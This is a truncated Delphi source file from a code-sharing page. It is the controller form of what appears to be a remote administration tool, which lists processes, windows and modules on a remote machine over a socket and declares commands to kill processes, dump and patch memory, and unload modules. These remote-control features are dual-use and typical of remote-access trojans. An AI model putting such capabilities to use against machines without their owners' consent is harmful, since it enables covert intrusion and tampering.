📄 unitprocesses.pas
字号:
unit UnitProcesses;
interface
uses
ShareMem,
Windows,
Messages,
SysUtils,
Variants,
Classes,
Graphics,
Controls,
Forms,
Dialogs,
Sockets,
StdCtrls,
ComCtrls,
ToolWin,
ImgList,
Buttons,
tlhelp32,
Menus,
CompressionStreamUnitForms,
ACMOut,
ACMConvertor, ExtCtrls;
type
TProcesses = class(TForm)
TreeView1: TTreeView;
PopupMenu1: TPopupMenu;
Refresh1: TMenuItem;
N1: TMenuItem;
KillProcess1: TMenuItem;
MemoryDump1: TMenuItem;
N2: TMenuItem;
SaveToFile1: TMenuItem;
PatchMemory1: TMenuItem;
N3: TMenuItem;
Panel1: TPanel;
SpeedButton1: TSpeedButton;
BitBtn1: TBitBtn;
BitBtn2: TBitBtn;
BitBtn3: TBitBtn;
SpeedButton2: TSpeedButton;
procedure FormCreate(Sender: TObject);
procedure Refresh1Click(Sender: TObject);
procedure MemoryDump1Click(Sender: TObject);
procedure TreeView1Click(Sender: TObject);
procedure KillProcess1Click(Sender: TObject);
procedure SaveToFile1Click(Sender: TObject);
procedure PopupMenu1Popup(Sender: TObject);
procedure PatchMemory1Click(Sender: TObject);
procedure FormClose(Sender: TObject; var Action: TCloseAction);
procedure FormDeactivate(Sender: TObject);
procedure UnloadModule1Click(Sender: TObject);
procedure FormShow(Sender: TObject);
private
{ Private declarations }
DataSocket: TCustomWinSocket;
Connected: Boolean;
TreeNode: TTreeNode;
LastHwndNode, LastModNode: TTreeNode;
szModule: string;
dwPID, dwHWND: dword;
ConnectNotifyInfo: TNotifyInfo;
ReadNotifyInfo: TNotifyInfo;
DisconnectNotifyInfo: TNotifyInfo;
procedure Connect(var Socket: TCustomWinSocket; Data: Pointer);
procedure Read(var Socket: TCustomWinSocket; CommandFrame: TCommandFrame; Stream: TMemoryStream; Data: Pointer);
procedure Disconnect(var Socket: TCustomWinSocket; Data: Pointer);
function SocketConnected: Boolean;
public
{ Public declarations }
RemoteAddress: string;
MainSocket: TCustomWinSocket;
WindowItem: TListItem;
end;
TWindowListing = record
PID: dword;
Hwnd: dword;
Text: array[0..MAX_PATH] of Char;
ClassName: array[0..MAX_PATH] of Char;
Rect: array[0..3] of dword;
Visible: Byte;
end;
PWindowListing = ^TWindowListing;
TListData = record
PID: dword;
Hwnd: dword;
Module: string;
Extra: dword;
end;
PListData = ^TListData;
implementation
uses
UnitMain,
UnitWindows;
{$R *.dfm}
const
P_TYPE = 2;
P_LIST = 1;
P_LISTPROC = 2;
P_LISTMOD = 3;
P_KILL = 4;
P_DUMP = 5;
P_LISTHWND = 6;
P_LOCK = 7;
P_UNLOCK = 8;
P_PATCH = 9;
P_UNLOAD = 10;
function Split(Input: string; Deliminator: string; Index: Integer): string;
var
StringLoop, StringCount: Integer;
Buffer: string;
begin
StringCount := 0;
for StringLoop := 1 to Length(Input) do
begin
if (Copy(Input, StringLoop, 1) = Deliminator) then
begin
Inc(StringCount);
if StringCount = Index then
begin
Result := Buffer;
Exit;
end
else
begin
Buffer := '';
end;
end
else
begin
Buffer := Buffer + Copy(Input, StringLoop, 1);
end;
end;
Result := Buffer;
end;
function TProcesses.SocketConnected: Boolean;
begin
if ((Connected) and (DataSocket <> nil)) then
begin
Connected := DataSocket.Connected;
if not Connected then BitBtn1.Caption := '已断开';
end;
Result := Connected;
end;
procedure TProcesses.Connect(var Socket: TCustomWinSocket; Data: Pointer);
var
Processes: TProcesses;
ConnectionInfo: TConnectionInfo;
begin
Processes := TProcesses(Data);
if TStreamRecord(Socket.Data).LocalAddress <> Processes.RemoteAddress then Exit;
if Processes.DataSocket = nil then Processes.DataSocket := Socket else Exit;
ConnectionInfo.ConnectionType := P_TYPE;
Socket.SendBuf(ConnectionInfo, SizeOf(TConnectionInfo));
Processes.Connected := True;
Processes.TreeView1.Cursor:=crDefault;
// Processes.Label3.Caption:= ' 已连接: ' + Socket.RemoteAddress;
// Processes.Label3.Tag := 1;
Processes.Refresh1Click(nil);
Socket := nil;
end;
procedure TProcesses.Read(var Socket: TCustomWinSocket; CommandFrame: TCommandFrame; Stream: TMemoryStream; Data: Pointer);
var
Processes: TProcesses;
Buffer: Pointer;
Save: TSaveDialog;
Text, IsVisible: string;
ListData: PListData;
NewNode: TTreeNode;
begin
Processes := TProcesses(Data);
if Processes.DataSocket = Socket then
begin
if not Processes.Visible then
begin
Socket := nil;
Exit;
end;
Buffer := Stream.Memory;
case CommandFrame.Command of
P_LISTPROC:
begin
Processes.TreeNode := Processes.TreeView1.Items.AddChild(nil, ExtractFileName(LowerCase(string(PProcessEntry32(Buffer)^.szExeFile))));
ListData := New(PListData);
ListData.PID := PProcessEntry32(Buffer)^.th32ProcessID;
ListData.Hwnd := 0;
ListData.Module := '';
Processes.TreeNode.Data := ListData;
Processes.TreeView1.Items.AddChild(Processes.TreeNode, '');
Processes.TreeView1.Items.AddChild(Processes.TreeNode, 'PID: ' + IntToStr(PProcessEntry32(Buffer)^.th32ProcessID));
Processes.TreeView1.Items.AddChild(Processes.TreeNode, '线程数: ' + IntToStr(PProcessEntry32(Buffer)^.cntThreads));
Processes.TreeView1.Items.AddChild(Processes.TreeNode, '父进程: ' + IntToStr(PProcessEntry32(Buffer)^.th32ParentProcessID));
Processes.TreeView1.Items.AddChild(Processes.TreeNode, '优先级: 0x' + IntToHex(PProcessEntry32(Buffer)^.pcPriClassBase, 4));
Processes.TreeView1.Items.AddChild(Processes.TreeNode, '标记: 0x' + IntToHex(PProcessEntry32(Buffer)^.dwFlags, 4));
Processes.LastModNode := nil;
Processes.LastHwndNode := nil;
end;
P_LISTHWND:
begin
if Processes.LastHwndNode = nil then
begin
Processes.LastHwndNode := Processes.TreeView1.Items.AddChild(Processes.TreeNode, 'Windows');
end;
if PWindowListing(Buffer).Visible = 0 then IsVisible := '' else IsVisible := ' (Visible)';
NewNode := Processes.TreeView1.Items.AddChild(Processes.LastHwndNode, PWindowListing(Buffer).ClassName + IsVisible);
ListData := New(PListData);
ListData.PID := 0;
ListData.Hwnd := PWindowListing(Buffer).Hwnd;
ListData.Module := '';
NewNode.Data := ListData;
Text := string(PChar(@PWindowListing(Buffer).Text));
if Length(Text) > 1 then Processes.TreeView1.Items.AddChild(NewNode, 'Text: ' + PWindowListing(Buffer).Text);
Processes.TreeView1.Items.AddChild(NewNode, 'Hwnd: ' + IntToStr(PWindowListing(Buffer).Hwnd));
Processes.TreeView1.Items.AddChild(NewNode, 'Rect: X1 = ' + IntToStr(PWindowListing(Buffer).Rect[0]) + ' Y1 = ' + IntToStr(PWindowListing(Buffer).Rect[1]) + ' X2 = ' + IntToStr(PWindowListing(Buffer).Rect[2]) + ' Y2 = ' + IntToStr(PWindowListing(Buffer).Rect[0]));
Processes.TreeView1.Items.AddChild(NewNode, 'Visible: ' + IntToStr(PWindowListing(Buffer).Visible));
end;
P_LISTMOD:
begin
if Processes.LastModNode = nil then
begin
Processes.LastModNode := Processes.TreeView1.Items.AddChild(Processes.TreeNode, '模块');
ListData := New(PListData);
ListData.PID := 0;
ListData.Hwnd := 0;
ListData.Module := '';
ListData.Extra := PListData(Processes.TreeNode.Data).PID;
Processes.LastModNode.Data := ListData;
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -